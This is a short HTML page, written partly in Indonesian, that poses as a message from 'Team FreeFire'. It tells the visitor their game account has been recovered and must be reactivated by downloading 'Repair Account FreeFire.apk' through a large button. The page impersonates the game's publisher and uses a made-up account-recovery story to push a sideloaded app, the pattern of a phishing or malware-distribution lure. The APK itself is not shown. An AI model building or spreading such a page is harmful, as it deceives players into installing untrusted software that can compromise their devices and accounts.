 <html>
<head>
 <style>
  *{
    margin: 0;
  }
   h1{
      background-color: red;
      color: white;
      font-size: 130px;
   } 
   h2{
    position: relative;
    text-align: center;
    font-size: 80px;
    top: 16%;
   }
   button{
      background-color: lightblue;
      color: white;
      font-size: 130px;
      width: 100%;
      height: 300px;
      position: relative;
      top: 16%;
      border-radius: 10px;
      box-shadow: 20px 14px 30px blue;
   }
   b{
    position: relative;
    font-size: 60px;
    text-align: center;
    top: 25%;
   }
 </style>
 </head>
 
 <body>
 <h1>FreeFire</h1>
 <img src="pepek.jpg" width="500px" />
<h2>Repair Account FreeFire</h2>
 <a href="Repair Account Freefire.apk" download="Repair Account FreeFire.apk"><button>DOWNLOAD</button></a>
 <b>Account anda Sudah pulih download aplikasi ini agar akun anda bisa aktif kembali kami dari Team FreeFire sudah memulihkan akun FreeFire anda</b>
</body>
 </html>
